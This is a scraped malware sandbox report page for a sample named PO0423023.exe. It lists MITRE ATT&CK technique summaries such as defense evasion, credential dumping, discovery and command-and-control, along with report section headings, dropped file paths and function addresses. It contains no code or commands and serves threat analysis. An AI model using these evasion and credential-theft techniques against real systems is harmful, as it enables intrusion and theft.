Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO0423023.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO0423023.exe.log

C:\Users\user\AppData\Local\Temp\43PI9J

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

Windows Analysis Report
PO0423023.exe

Function 00BBD051 Relevance: 6.1, APIs: 4, Instructions: 130
threadCOMMON

Function 00BBD060 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 0948DED4 Relevance: 1.8, APIs: 1, Instructions: 251
processCOMMON

Function 0948DEE0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 00BBADC8 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Function 00BB5A84 Relevance: 1.6, APIs: 1, Instructions: 105
COMMON

Function 00BB590C Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Function 00BB44B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 0948DC51 Relevance: 1.6, APIs: 1, Instructions: 73
injectionCOMMON

Function 0948DC58 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 0948DAB8 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Function 0948DD41 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Function 0948DAC0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre